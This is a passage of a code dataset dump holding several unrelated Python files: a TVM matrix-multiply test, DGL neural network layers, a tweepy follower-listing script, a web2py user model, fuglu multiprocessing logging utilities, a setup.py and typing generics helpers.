dtype=b.dtype, low = -16, high = 16)\n # b_np = np.ones(shape2, dtype=b.dtype)\n b_nd = tvm.nd.array(b_np, ctx)\n bias_np = np.random.randint(size=(shape2[1], ), dtype=bias.dtype, low = -128, high = 127)\n # bias_np = np.ones((shape2[1], ), dtype=bias.dtype)\n bias_nd= tvm.nd.array(bias_np, ctx)\n\n out_nd = tvm.nd.array(np.zeros(out_shape_tiled, dtype=out_host.dtype), ctx)\n\n func(a_nd, b_nd, bias_nd, out_nd)\n\n gt = np.matmul(a_np, b_np.transpose(), dtype='int16')+bias_np\n gt = gt.astype(np.int8)\n out_np = out_nd.asnumpy()\n # print(out_np)\n out_np = np.transpose(out_np, axes=(0, 2, 1, 3))\n out_np = np.reshape(out_np, (128, 1024))\n np.testing.assert_allclose(gt, out_np)\n print('test passed')","sub_path":"nnpu/tests/article_demos/gemm-davinci.py","file_name":"gemm-davinci.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"606195626","text":"from typing import Callable\n\nimport torch\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch import TAGConv\nfrom torch import nn\n\n\nclass MLP(nn.Module):\n def __init__(\n self, in_dim: int, out_dim: int, activation: Callable = F.relu\n ):\n super(MLP, self).__init__()\n self.fc1 = nn.Linear(in_dim, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, out_dim)\n self.activation = activation\n\n def forward(self, x: torch.Tensor):\n x = self.activation(self.fc1(x))\n x = self.activation(self.fc2(x))\n return self.fc3(x)\n\n\nclass TAG(nn.Module):\n def __init__(\n self,\n in_dim: int,\n hidden_dim: int,\n out_dim: int,\n k: int = 2,\n activation: Callable = F.relu,\n ):\n super(TAG, self).__init__()\n self.layer1 = TAGConv(in_dim, hidden_dim, k, activation=activation)\n self.layer2 = TAGConv(hidden_dim, hidden_dim, k, activation=activation)\n self.layer3 = TAGConv(hidden_dim, out_dim, k, activation=activation)\n self.activation = activation\n\n def forward(self, graph, inputs):\n h = self.layer1(graph, inputs)\n h = self.activation(h)\n h = self.layer2(graph, h)\n h = self.activation(h)\n h = self.layer3(graph, h)\n return h\n","sub_path":"espaloma/redux/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455448484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 7 12:56:46 2017\n\n@author: oliverbeatson\n\"\"\"\n# Code adapted from http://tweepy.readthedocs.io/en/v3.5.0/\n# Code brings through list of followers for specified ID\n\nimport tweepy\nimport AccessKeys\nimport datetime\n\n# Uses keys from APP setup to access Twitter Account information\n# Access Keys held in seperate folder\n\nauth = tweepy.OAuthHandler(ConsumerKey, ConsumerSecret)\nauth.set_access_token(AccessToken, AccessTokenSecret)\n\n# Establishes API through tweepy\napi = tweepy.API(auth)\n\nsleeptime = 20\npages = tweepy.Cursor(api.followers, screen_name=\"******\").pages()\n\nwhile True:\n try:\n page = next(pages)\n except tweepy.TweepError:\n page = next(pages)\n except StopIteration:\n break\n \nfor user in page:\n print(user.screen_name)\n\n ","sub_path":"Followers_of_ID.py","file_name":"Followers_of_ID.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"110275939","text":"# -*- coding: utf-8 -*-\n\nfrom gluon.dal import Field\nfrom basemodel import BaseAuth, BaseModel\nfrom gluon.validators import IS_NOT_IN_DB, IS_IN_SET, IS_EMPTY_OR, IS_DATE, IS_URL, IS_SLUG, IS_NOT_EMPTY\nfrom helpers.images import THUMB2\nfrom gluon import CAT, A, IMG, XML, DIV, P\n\n\nclass User(BaseAuth):\n def set_properties(self):\n request = self.db.request\n T = self.db.T\n self.fields = [\n # Person info\n Field(\"nickname\", notnull=True),\n Field(\"tagline\"),\n Field(\"twitter\", \"string\"),\n Field(\"facebook\", \"string\"),\n Field(\"website\", \"string\"),\n Field(\"avatar\", \"upload\"),\n Field(\"thumbnail\", \"upload\"),\n Field(\"photo_source\", \"integer\", default=1),\n Field(\"about\", \"text\"),\n Field(\"gender\", \"string\"),\n Field(\"birthdate\", \"date\"),\n # Preferences\n Field(\"privacy\", \"integer\", notnull=True, default=1), # 1 = public, 2 = contacts, 3 = private\n Field(\"facebookid\", \"string\"),\n Field(\"registration_type\", \"integer\", notnull=True, default=1), # 1 = local, 2 = Facebook\n # counters\n Field(\"articles\", \"integer\", notnull=True, default=0),\n Field(\"draft_articles\", \"integer\", notnull=True, default=0),\n Field(\"messages\", \"integer\", notnull=True, default=0),\n Field(\"draft_messages\", \"integer\", notnull=True, default=0),\n Field(\"unread_messages\", \"integer\", notnull=True, default=0),\n Field(\"sent_messages\", \"integer\", notnull=True, default=0),\n Field(\"comments\", \"integer\", notnull=True, default=0),\n Field(\"rating_count\", \"integer\", notnull=True, default=0),\n Field(\"rating_total\", \"integer\", notnull=True, default=0),\n Field(\"rating_average\", \"integer\", notnull=True, default=0),\n Field(\"threads\", \"integer\", notnull=True, default=0),\n Field(\"responses\", \"integer\", notnull=True, default=0),\n Field(\"groups\", \"integer\", notnull=True, default=0),\n Field(\"contacts\", \"integer\", notnull=True, default=0),\n Field(\"userpages\", \"integer\", notnull=True, default=0),\n Field(\"pictures\", \"integer\", notnull=True, default=0),\n Field(\"favorites\", \"integer\", notnull=True, default=0),\n Field(\"likes\", \"integer\", notnull=True, default=0),\n Field(\"dislikes\", \"integer\", notnull=True, default=0),\n Field(\"subscriptions\", \"integer\", notnull=True, default=0),\n # location\n Field(\"country\", \"string\"),\n Field(\"city\", \"string\"),\n Field(\"languages\", \"list:string\"),\n ]\n\n self.register_visibility = {\n \"nickname\": (True, True)\n }\n\n self.profile_visibility = {\n \"privacy\": (True, True),\n \"nickname\": (True, True),\n \"tagline\": (True, True),\n \"twitter\": (True, True),\n \"facebook\": (True, True),\n \"website\": (True, True),\n \"avatar\": (True, True),\n \"thumbnail\": (True, True),\n \"photo_source\": (True, True),\n \"about\": (True, True),\n \"gender\": (True, True),\n \"birthdate\": (True, True),\n \"country\": (True, True),\n \"city\": (True, True),\n \"languages\": (True, True),\n }\n\n self.computations = {\n \"thumbnail\": lambda r: THUMB2(r['avatar'], gae=request.env.web2py_runtime_gae),\n }\n\n self.labels = {\n \"first_name\": T(\"First Name\"),\n \"last_name\": T(\"Last Name\"),\n \"email\": T(\"E-mail\"),\n \"password\": T(\"Password\"),\n \"nickname\": T(\"Username\"),\n \"privacy\": T(\"Privacy\"),\n \"tagline\": T(\"Tagline\"),\n \"twitter\": T(\"twitter\"),\n \"facebook\": T(\"Facebook\"),\n \"website\": T(\"website\"),\n \"avatar\": T(\"avatar\"),\n \"photo_source\": T(\"Photo source\"),\n \"about\": T(\"about\"),\n \"gender\": T(\"Gender\"),\n \"birthdate\": T(\"Birth Date\"),\n \"country\": T(\"Country\"),\n \"city\": T(\"City\"),\n \"languages\": T(\"Languages\")\n }\n\n self.comments = {\n \"nickname\": T(\"Your desired username\"),\n \"privacy\": T(\"Your profile privacy\"),\n \"tagline\": T(\"A short sentence about you\"),\n \"twitter\": T(\"twitter account\"),\n \"facebook\": T(\"Facebook username or ID\"),\n \"website\": T(\"website or blog\"),\n \"avatar\": T(\"your profile picture\"),\n \"photo_source\": T(\"Which photo to use in your profile\"),\n \"about\": T(\"about you\"),\n \"gender\": T(\"Gender\"),\n \"birthdate\": T(\"Birth Date\"),\n \"country\": T(\"Country\"),\n \"city\": T(\"City\"),\n \"languages\": T(\"Languages you speak\")\n }\n\n def set_validators(self):\n config = self.db.config\n T = self.db.T\n request = self.db.request\n self.entity.nickname.requires = [IS_SLUG(), IS_NOT_IN_DB(self.db, self.entity.nickname)]\n self.entity.twitter.requires = IS_EMPTY_OR(IS_NOT_IN_DB(self.db, self.entity.twitter))\n self.entity.facebook.requires = IS_EMPTY_OR(IS_NOT_IN_DB(self.db, self.entity.facebook))\n\n self.entity.photo_source.requires = IS_IN_SET(config.get_list('auth', 'photo_source'))\n self.entity.gender.requires = IS_IN_SET(config.get_list('auth', 'gender'))\n self.entity.privacy.requires = IS_IN_SET(config.get_list('auth', 'privacy'))\n #date format not allowed on gae\n if not request.env.web2py_runtime_gae:\n self.entity.birthdate.requires = IS_EMPTY_OR(IS_DATE(format=str(T('%Y-%m-%d'))))\n\n self.entity.website.requires = IS_EMPTY_OR(IS_URL())\n\n\nclass UserBoard(BaseModel):\n tablename = \"user_board\"\n\n def set_properties(self):\n self.fields = [\n Field(\"user_id\", \"reference auth_user\"),\n Field(\"writer\", \"reference auth_user\"),\n Field(\"board_text\", \"string\"),\n ]\n\n self.visibility = {\n \"user_id\": (False, False),\n \"writer\": (False, False)\n }\n\n self.validators = {\n \"board_text\": IS_NOT_EMPTY()\n }\n\n def set_fixtures(self):\n self.entity._write_on_board = self.write_on_board\n\n def write_on_board(self, user_id, writer, text):\n self.entity.insert(user_id=user_id, writer=writer, board_text=text)\n self.db.commit()\n\n\nclass UserContact(BaseModel):\n tablename = \"user_contact\"\n\n def set_properties(self):\n self.fields = [\n Field(\"follower\", \"reference auth_user\"),\n Field(\"followed\", \"reference auth_user\"),\n ]\n\n def set_fixtures(self):\n self.entity._relation = self.relation\n\n def relation(self, a, b):\n if a == b:\n return 'yourself'\n a_follows_b = self.db((self.entity.follower == a) & ((self.entity.followed == b))).count()\n b_follows_a = self.db((self.entity.follower == b) & ((self.entity.followed == a))).count()\n if all([a_follows_b, b_follows_a]):\n return 'contacts'\n elif a_follows_b:\n return 'following'\n elif b_follows_a:\n return 'follower'\n else:\n return 'unknown'\n\n\nclass UserTimeLine(BaseModel):\n tablename = \"user_timeline\"\n\n def set_properties(self):\n self.fields = [\n Field(\"user_id\", \"reference auth_user\"),\n Field(\"nickname\", \"string\"),\n Field(\"event_type\", \"string\"),\n Field(\"event_to\", \"string\"),\n Field(\"event_reference\", \"integer\"),\n Field(\"event_text\", \"text\"),\n Field(\"event_image\", \"string\"),\n Field(\"event_link\", \"string\"),\n ]\n\n self.representation = {\n \"created_on\": lambda v: self.db.pdate(v)\n }\n\n def set_fixtures(self):\n self.entity._new_event = self.new_event\n\n def new_event(self, form=None, v=None):\n if not v:\n v = self.db.request.vars\n elif v == 'form':\n v = form.vars\n else:\n from gluon.storage import Storage\n v = Storage(v)\n\n event_text = v.event_text or v.comment_text or ' '\n data = dict(\n user_id=int(v.user_id),\n nickname=v.nickname,\n event_type=v.event_type,\n event_image=v.event_image,\n event_to=v.event_to,\n event_reference=int(v.event_reference),\n event_text=event_text[:50],\n event_link=v.event_link\n )\n self.entity.insert(**data)\n self.db.commit()\n","sub_path":"modules/datamodel/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557329671","text":"# -*- coding: utf-8 -*-\n# Copyright 2009-2019 Fumail Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n#\n#\nimport logging\nimport logging.handlers\nimport logging.config\nimport os\nimport multiprocessing\nimport signal\nimport sys\n\n\ndef logFactoryProcess(listenerQueue,logQueue):\n \"\"\"\n This process is responsible for creating the logger listener for the given queue.\n This Listener process is responsible for actually handling all the log messages in the queue.\n\n You might ask why this is a separate process. This log-implementation satisfies two constraints:\n - it has to work in multiprocessing mode\n - it has to work with TimedRotatingFileHandler\n - it has to at least be possible to change the debug level down to DEBUG\n\n Even in multiprocessing the subprocess inherits a lot of things from its father process at creation time.\n Using the logging module this can create quite weird effects. Withoug any change, using a TimedRotatingFileHandler\n most processes might still write to the old (archived) log file while the process that actually rotated the file\n and its threads will write to the new one.\n If the separate log process is created directly as a child of the main process is it not possible to recreate the\n log process later to take into account a new configuration, even if using a config server listener. The messages\n received from other processes will not necessarily apply the correct debug level if this has been changed.\n\n The only \"clean\" solution found so far is to always create the logging process from a clean process which does not\n have any logging structure stored yet. Therefore, the logFactoryProcess is created at the very beginning and it\n can produce new clean logging processes later that will properly setup with all propagation and level changes.\n\n Args:\n listenerQueue (multiprocessing.Queue): Queue where the logFactoryProcess will receive a configuration for\n which a new logging process will be created replacint the old one\n logQueue (multiprocessing.Queue): The queue where log messages will be sent, handled finally by the logging\n process\n\n \"\"\"\n signal.signal(signal.SIGHUP, signal.SIG_IGN)\n\n loggerProcess = None\n while True:\n try:\n logConfig = listenerQueue.get()\n\n # if existing stop last logger process\n if loggerProcess:\n # try to close the old logger\n try:\n logQueue.put_nowait(None)\n loggerProcess.join(10) # wait 10 seconds max\n except Exception:\n loggerProcess.terminate()\n finally:\n loggerProcess = None\n\n if logConfig is None: # We send this as a sentinel to tell the listener to quit.\n break\n\n # create new logger process\n loggerProcess = multiprocessing.Process(target=listener_process, args=(logConfig,logQueue))\n loggerProcess.daemon = True\n loggerProcess.start()\n\n except KeyboardInterrupt:\n print(\"Listener process received KeyboardInterrupt\")\n #break\n except Exception:\n import sys, traceback\n print('LogFactoryProcess: Problem:', file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n # if existing stop last logger process\n if loggerProcess:\n # try to close the old logger\n try:\n logQueue.put_nowait(None)\n loggerProcess.join(10) # wait 10 seconds max\n except Exception:\n import sys, traceback\n loggerProcess.terminate()\n print('LogFactoryProcess: Problem:', file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n\nclass logConfig(object):\n \"\"\"\n Conig class to easily distinguish logging configuration for lint, foreground and production (from file)\n \"\"\"\n def __init__(self, lint=False, logConfigFile=\"none\", foreground=False, level=None):\n \"\"\"\n Setup in lint mode of using a config file\n Args:\n lint (bool): enable lint mode which will print on the screen\n logConfigFile (): load configuration from config file\n foreground (bool): enable foreground mode which will print on the screen like lint (but no level)\n \"\"\"\n # one option should be true\n assert ((1 if lint else 0) +\n (1 if foreground else 0) +\n (1 if logConfigFile != \"none\" else 0) == 1)\n\n self._configFile = logConfigFile\n if lint:\n self._level = logging.ERROR\n else:\n if level == \"DEBUG\":\n self._level = logging.DEBUG\n elif level == \"INFO\":\n self._level = logging.INFO\n elif level == \"ERROR\":\n self._level = logging.ERROR\n else:\n self._level = logging.NOTSET\n\n self._lint = lint\n self._foreground = foreground\n\n def configure(self):\n \"\"\"\n Configure for lint mode or from file. We can not set a \"pointer\" to the function\n ----\n if self._lint or self._foreground:\n self.configure = self._configure4screen\n elif self._configFile != \"none\":\n self.configure = self._configure\n else:\n raise Exception(\"Not implemented!\")\n ----\n because objects of this type are sent into the logger queue. Python 2.7 can then\n not pickle the instance.\n \"\"\"\n if self._lint or self._foreground:\n logConfig._configure4screen(self._level, timeinformat=self._foreground)\n elif self._configFile != \"none\":\n if not os.path.exists(self._configFile):\n raise FileNotFoundError(\"Logging config file %s does not exist!\" % self._configFile)\n\n logConfig._configure(self._configFile)\n else:\n raise Exception(\"Not implemented!\")\n\n @staticmethod\n def _configure4screen(outputlevel, timeinformat=False):\n \"\"\"\n Configure for stdout (output is on the screen)\n \"\"\"\n root = logging.getLogger()\n root.setLevel(logging.NOTSET)\n console = logging.StreamHandler(sys.stdout)\n console.setLevel(outputlevel)\n if timeinformat:\n formatter = logging.Formatter('[%(process)-5d] %(asctime)s : %(name)-25s: %(levelname)-s, %(message)s')\n else:\n # set a format which is simpler for console use\n formatter = logging.Formatter('[%(process)-5d] %(name)-25s: %(levelname)-s, %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n root.addHandler(console)\n\n @staticmethod\n def _configure(configFile):\n \"\"\"\n Configure logging using log configuration file\n \"\"\"\n logging.config.fileConfig(configFile)\n # get root logger once just to make sure this global configuration exists\n root = logging.getLogger()\n\n\ndef listener_process(configurer,queue):\n \"\"\"\n This is the listener process top-level loop: wait for logging events\n (LogRecords) on the queue and handle them, quit when you get a None for a\n LogRecord.\n\n Args:\n configurer (logConfig): instance lof logConfig class setting up logging on configure call\n queue (multiprocessing.Queue): The queue where log messages will be received and processed by this same process\n \"\"\"\n\n signal.signal(signal.SIGHUP, signal.SIG_IGN)\n\n configurer.configure()\n root = logging.getLogger()\n root.info(\"Listener process started\")\n logLogger = logging.getLogger(\"LogListener\")\n if logLogger.propagate:\n root.info(\"No special Log-logger\")\n logLogger = None\n else:\n root.info(\"Using special LogLogger\")\n\n while True:\n try:\n record = queue.get()\n if record is None: # We send this as a sentinel to tell the listener to quit.\n root.info(\"Listener process received poison pill\")\n break\n\n if logLogger:\n logLogger.debug(\"Approx queue size: %u, received record to process -> %s\"%(queue.qsize(),record))\n\n if queue.full():\n root.error(\"QUEUE IS FULL!!!\")\n if logLogger:\n logLogger.error(\"QUEUE IS FULL!!!\")\n\n logger = logging.getLogger(record.name)\n\n # check if this record should be logged or not...\n # the filter function should detect if the level is sufficient, but somehow it fails\n # so the check has to be done manually\n if logger.filter(record) and record.levelno >= logger.getEffectiveLevel():\n logger.handle(record)\n except KeyboardInterrupt:\n print(\"Listener process received KeyboardInterrupt\")\n root.warning(\"Listener received exception\")\n #break\n except Exception as e:\n root.warning(\"Listener received exception\")\n root.exception(e)\n root.info(\"Listener process stopped\")\n\n\ndef client_configurer(queue, level=\"NOTSET\"):\n \"\"\"\n The client configuration is done at the start of the worker process run.\n Note that on Windows you can't rely on fork semantics, so each process\n will run the logging configuration code when it starts.\n The log level is the minimum applied on the clients, final decision\n will be applied on the log-listener. But if the base-level here is INFO\n then setting the level to \"DEBUG\" in \"logging.conf\" will not show DEBUG-level\n messages.\n\n Args:\n queue (multiprocessing.Queue): queue where to send log messages\n level (str): log-level (DEBUG, INFO, ERROR) for all the clients\n\n \"\"\"\n root = logging.getLogger()\n\n numRootHandlers = len(root.handlers)\n name = createPIDinfo()\n\n if numRootHandlers == 0:\n try:\n # Python 3\n h = logging.handlers.QueueHandler(queue) # Just the one handler needed\n except AttributeError:\n # Python 2\n h = QueueHandlerPy3Copy(queue)\n root.addHandler(h)\n # send all messages\n if level == \"DEBUG\":\n root.setLevel(logging.DEBUG)\n elif level == \"INFO\":\n root.setLevel(logging.INFO)\n elif level == \"ERROR\":\n root.setLevel(logging.ERROR)\n else:\n root.setLevel(logging.NOTSET)\n root.info(\"Log-Level \\\"%s\\\" not vaild, setting NOTSET\" % level)\n root.info(\"(%s) Queue handler added to root logger\" % name)\n else:\n # on linux config is taken from father process automatically\n root.info(\"(%s) Root already has a handler -> not adding Queue handler\" % name)\n\n\n#----------------------------------------#\n#-- Copied from Python 3 - handlers.py --#\n#----------------------------------------#\nclass QueueHandlerPy3Copy(logging.Handler):\n \"\"\"\n This handler sends events to a queue. Typically, it would be used together\n with a multiprocessing Queue to centralise logging to file in one process\n (in a multi-process application), so as to avoid file write contention\n between processes.\n\n This code is new in Python 3.2, but this class can be copy pasted into\n user code for use with earlier Python versions.\n \"\"\"\n\n def __init__(self, queue):\n \"\"\"\n Initialise an instance, using the passed queue.\n \"\"\"\n logging.Handler.__init__(self)\n self.queue = queue\n\n def enqueue(self, record):\n \"\"\"\n Enqueue a record.\n\n The base implementation uses put_nowait. You may want to override\n this method if you want to use blocking, timeouts or custom queue\n implementations.\n \"\"\"\n self.queue.put_nowait(record)\n\n def prepare(self, record):\n \"\"\"\n Prepares a record for queuing. The object returned by this method is\n enqueued.\n\n The base implementation formats the record to merge the message\n and arguments, and removes unpickleable items from the record\n in-place.\n\n You might want to override this method if you want to convert\n the record to a dict or JSON string, or send a modified copy\n of the record while leaving the original intact.\n \"\"\"\n # The format operation gets traceback text into record.exc_text\n # (if there's exception data), and also puts the message into\n # record.message. We can then use this to replace the original\n # msg + args, as these might be unpickleable. We also zap the\n # exc_info attribute, as it's no longer needed and, if not None,\n # will typically not be pickleable.\n self.format(record)\n record.msg = record.message\n record.args = None\n record.exc_info = None\n return record\n\n def emit(self, record):\n \"\"\"\n Emit a record.\n\n Writes the LogRecord to the queue, preparing it for pickling first.\n \"\"\"\n try:\n self.enqueue(self.prepare(record))\n except Exception:\n self.handleError(record)\n\n\ndef createPIDinfo():\n infoString = \"\"\n if hasattr(os, 'getppid'): # only available on Unix\n infoString += 'parent process: %u, ' % os.getppid()\n infoString += 'process id: %u' % os.getpid()\n return infoString\n\n\nclass PrependLoggerMsg(object):\n \"\"\"Prepend something to all log messages of original logger, for example fuglu id\"\"\"\n def __init__(self, origlogger, prepend,\n prependseparator=\" \",\n maxlevel=None,\n minlevel=None\n ):\n self._origlogger = origlogger\n self.prepend = prepend\n self.prependseparator = prependseparator\n assert minlevel in [logging.DEBUG, logging.WARNING, logging.INFO, logging.ERROR, None]\n assert maxlevel in [logging.DEBUG, logging.WARNING, logging.INFO, logging.ERROR, None]\n minlevel = minlevel if minlevel is not None else -1000\n maxlevel = maxlevel if maxlevel is not None else 1000\n\n self.debuglevel = max(min(logging.DEBUG, maxlevel), minlevel)\n self.infolevel= max(min(logging.INFO, maxlevel), minlevel)\n self.warninglevel= max(min(logging.WARNING, maxlevel), minlevel)\n self.errorlevel= max(min(logging.ERROR, maxlevel), minlevel)\n self.criticallevel= max(min(logging.CRITICAL, maxlevel), minlevel)\n\n self.origroutines = {\n logging.DEBUG: self._origlogger.debug,\n logging.INFO: self._origlogger.info,\n logging.WARNING: self._origlogger.warning,\n logging.ERROR: self._origlogger.error,\n logging.CRITICAL: self._origlogger.critical\n }\n\n def debug(self, msg, *args, **kwargs):\n self.origroutines[self.debuglevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def info(self, msg, *args, **kwargs):\n self.origroutines[self.infolevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def warning(self, msg, *args, **kwargs):\n self.origroutines[self.warninglevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def error(self, msg, *args, **kwargs):\n self.origroutines[self.errorlevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def critical(self, msg, *args, **kwargs):\n self.origroutines[self.criticallevel](\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def exception(self, msg, *args, **kwargs):\n self._origlogger.exception(\"%s%s%s\" % (self.prepend, self.prependseparator, msg), *args, **kwargs)\n\n def __getattr__(self, attr):\n \"\"\"if attribute doesn't exist __getattr__ is called, redirect to wrapped logger\"\"\"\n return getattr(self._origlogger, attr)\n\n\nclass LoggingContext(object): \n \"\"\"to be used for 'with'-statements to temporarily change a logger\"\"\"\n def __init__(self, logger, level=None, handler=None, close=True): \n self.logger = logger \n self.level = level \n self.handler = handler \n self.close = close \n \n def __enter__(self): \n if self.level is not None: \n self.old_level = self.logger.level \n self.logger.setLevel(self.level) \n if self.handler: \n self.logger.addHandler(self.handler) \n \n def __exit__(self, et, ev, tb): \n if self.level is not None: \n self.logger.setLevel(self.old_level) \n if self.handler: \n self.logger.removeHandler(self.handler) \n if self.handler and self.close: \n self.handler.close()","sub_path":"fuglu/src/fuglu/logtools.py","file_name":"logtools.py","file_ext":"py","file_size_in_byte":17378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"492705295","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2013 Spotify AB\n\nimport os.path\n\nfrom spotify_build.build import setup, BuildProtobuf\n\n# BuildProtobuf defaults to /usr/share/, which is bad for Debian\n# and Mac OS X installations (in package libprotobuf-dev. {deb})\nincpaths = set([\n '/usr/include',\n '/usr/local/include'\n])\n\nfor include_path in incpaths:\n if os.path.exists(include_path + '/google/protobuf/descriptor.proto'):\n os.environ['PROTOBUFPATH'] = include_path\n\nsetup(\n name='spotify-spire-pythonlib',\n version='1',\n author=u'Tommie Gannert',\n author_email='tommie@spotify.com',\n url='https://wiki.spotify.net/wiki/Python_packaging_policy',\n description='Spotify Internal Remote Execution Python library',\n packages=[\n 'spotify_spire',\n ],\n cmdclass=dict(protoc=BuildProtobuf),\n build_protobuf=[\n ('proto/spire.proto', 'spotify_spire/spire_pb2.py'),\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481999106","text":"import logging\nimport sys\nimport typing\nfrom collections.abc import Callable as abcCallable\n\nP38 = sys.version_info[:3] >= (3, 8, 0)\nP37 = sys.version_info[:2] == (3, 7)\n\nif not P38:\n logging.getLogger(\"compose.generics\").warning(\"Version before 3.8 detected generics may not behave well\")\n\n__all__ = ['get_generic_type',\n 'is_generic_type',\n 'get_bound',\n 'get_parameters',\n 'get_origin']\n\n\ndef get_parameters(tp):\n \"\"\"Return type parameters of a parameterized type as a tuple.\n \"\"\"\n try:\n return tp.__parameters__ if tp.__parameters__ is not None else ()\n except:\n return ()\n\n\ntry:\n get_origin = typing.get_origin\nexcept:\n def get_origin(tp):\n \"\"\"Get the unsubscripted version of a type. Supports generic types, Union,\n Callable, and Tuple. Returns None for unsupported types. Examples::\n \"\"\"\n if isinstance(tp, typing._GenericAlias):\n return tp.__origin__ if tp.__origin__ is not typing.ClassVar else None\n if tp is typing.Generic:\n return typing.Generic\n return None\n\ntry:\n get_args = typing.get_args\nexcept:\n def get_args(tp, evaluate=None):\n \"\"\"Get type arguments with all substitutions performed. For unions,\n basic simplifications used by Union constructor are performed.\n On versions prior to 3.7 if `evaluate` is False (default),\n report result as nested tuple, this matches\n the internal representation of types. If `evaluate` is True\n (or if Python version is 3.7 or greater), then all\n type parameters are applied (this could be time and memory expensive).\n Examples::\n\n\n \"\"\"\n if evaluate is not None and not evaluate:\n raise ValueError('evaluate can only be True in Python 3.7')\n if isinstance(tp, typing._GenericAlias):\n res = tp.__args__\n if get_origin(tp) is abcCallable and res[0] is not Ellipsis:\n res = (list(res[:-1]), res[-1])\n return res\n return ()\n\n\ndef get_generic_bases(tp):\n \"\"\"Get generic base types of a type or empty tuple if not possible.\n \"\"\"\n org = getattr(tp, '__origin__', None)\n if org:\n a = (org,)\n else:\n a = ()\n return a + getattr(tp, \"__orig_bases__\", ())\n\n\ndef is_generic_type(kls):\n \"\"\"Test if the given type is a generic type. This includes Generic itself, but\n excludes special typing constructs such as Union, Tuple, Callable, ClassVar.\n See Unit tests for examples and expected outcomes.\n \"\"\"\n if isinstance(kls, typing._GenericAlias):\n if isinstance(kls.__origin__, typing._SpecialForm) or kls.__origin__ == abcCallable:\n return False\n return True\n # noinspection PyTypeHints\n return isinstance(kls, type) and issubclass(kls, typing.Generic)\n\n\ndef resolve_type(cls, type_name, parent=None):\n if isinstance(type_name, str) and type_name[0] != \"~\":\n type_name = \"~\" + type_name\n for base in get_generic_bases(cls):\n res = resolve_type(base, type_name, parent=cls)\n if res is not None and str(res) != str(type_name):\n return res\n\n for idx, parm in enumerate(get_parameters(cls)):\n if str(parm) == str(type_name):\n try:\n return get_args(parent)[idx]\n except IndexError:\n pass\n return None\n\n\ndef is_optional(kls):\n \"\"\"Returns `True` if the type is `type(None)`, has a Union to none, like Optional[], Nested `Union` arguments\n are inspected\n\n `TypeVar` Edge case:\n TypeVar` definitions are not inspected. If only the bound/constraint of a typevar is Optional is_optional\n will return False. (see edge case test for clarity)\n \"\"\"\n\n if kls is type(None):\n return True\n return any(is_optional(sub_kls) for sub_kls in get_args(kls))\n\n\n# Simple accessors instead of accessing __ attributes, they tend to change a bt right now.\n\ndef get_bound(kls):\n \"\"\"Returns the type bound to a `TypeVar` if any. Fails if not TypeVar\n \"\"\"\n assert_typevar(kls)\n return getattr(kls, '__bound__', None)\n\n\ndef get_constraints(kls):\n \"\"\"Returns the constraints of a `TypeVar` if any. Fails if not TypeVar\"\"\"\n\n assert_typevar(kls)\n return getattr(kls, '__constraints__', ())\n\n\ndef assert_typevar(kls):\n \"\"\"A more forceful check for typevar. If the type is not a `TypeVar`, a `TypeError` is raised\"\"\"\n if is_typevar(kls):\n return\n raise TypeError(f\"'{kls.__name__}' is not a `TypeVar`\")\n\n\ndef is_typevar(tp):\n \"\"\"Test if the type represents a type variable. Examples::\n \"\"\"\n\n return type(tp) is typing.TypeVar\n\n\ndef get_generic_type(obj):\n \"\"\"Get the generic type of an object if possible, or runtime class otherwise.\n Examples::\n\n class Node(Generic[T]):\n ...\n type(Node[int]()) == Node\n get_generic_type(Node[int]()) == Node[int]\n get_generic_type(Node[T]()) == Node[T]\n get_generic_type(1) == int\n \"\"\"\n\n gen_type = getattr(obj, '__orig_class__', None)\n return gen_type if gen_type is not None else type(obj)\n","sub_path":"datamapping/_helpers/generics.py","file_name":"generics.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339221098","text":"import numpy as np\nimport pylab as py\n\npts = 1000\nrad = \"r = 500 nm\"\n\neps_file = open(\"silver.txt\",'w')\nwaves = np.linspace(300,1100,pts)\nnr = waves*0+ 1.0\nni = waves*0\n\nc = 299792458\nhbar = 1.05457173e-34\ne = 1.602176565e-19\n\ndef Au():\n wp = 9.03\n sig = [.760,.024,.010,.071,.601,4.384]\n f = [0,.415,.830,2.969,4.304,13.32]\n gam = [.053,.241,.345,.870,2.494,2.214]\n\n size = len(sig)\n \n waves = 